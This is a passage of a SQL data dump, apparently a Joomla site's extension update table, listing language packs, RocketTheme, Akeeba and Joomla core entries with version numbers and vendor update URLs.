NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26781,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26782,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26783,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26784,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26785,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26786,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26787,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26788,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26789,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26790,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26791,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26792,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26793,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26794,57,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26795,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26796,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26797,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26798,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26799,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26800,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26801,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26802,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26803,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26804,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26805,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26806,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26807,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26808,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26809,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26810,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(26811,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26812,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26813,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26814,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26815,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26816,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26817,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26818,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26819,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26820,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26821,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26822,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26823,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26824,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26825,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26826,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26827,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26828,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26829,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26830,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26831,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26832,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26833,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26834,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26835,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26836,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26837,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26838,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26839,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26840,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26841,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26842,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26843,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(26844,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(26845,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(26847,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26848,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26849,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26850,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26851,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26852,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26853,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26854,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26855,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26856,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26857,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26858,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26859,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26860,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26861,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26862,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26863,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26864,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26865,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26866,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26867,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26868,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26869,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26870,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26871,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26872,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26873,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26874,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26875,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26876,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26877,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26878,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26879,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26880,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26881,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26882,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26883,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26884,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26885,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26886,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26887,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26888,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26889,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26890,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26891,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26892,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26893,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26894,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26895,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26896,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26897,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26898,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26899,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26900,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26901,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26902,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26903,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26904,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26905,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26906,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26907,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-1.html',''),(26908,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26909,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26910,1,0,'Joomla','','joomla','file','',0,'3.9.24','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26911,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26912,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26913,3,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26914,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26915,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26916,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26917,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26918,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26919,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26920,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26921,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26922,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26923,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26924,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26925,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26926,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26927,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26928,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26929,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(26930,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26931,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26932,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26933,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26934,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26935,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26936,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26937,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26938,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26939,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26940,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26941,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26942,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26943,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26944,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26945,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26946,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26947,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26948,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26949,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26950,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26951,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26952,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26953,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26954,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26955,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26956,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26957,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26958,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26959,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26960,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26961,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26962,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26963,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26964,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26965,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26966,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26967,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26968,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26969,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26970,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26971,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26972,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26973,57,0,'French','','pkg_fr-FR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26974,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26975,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26976,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26977,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26978,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26979,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26980,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26981,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26982,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26983,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26984,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26985,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26986,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26987,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26988,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26989,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.24.2','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(26990,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26991,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26992,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26993,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26994,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26995,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26996,57,0,'English 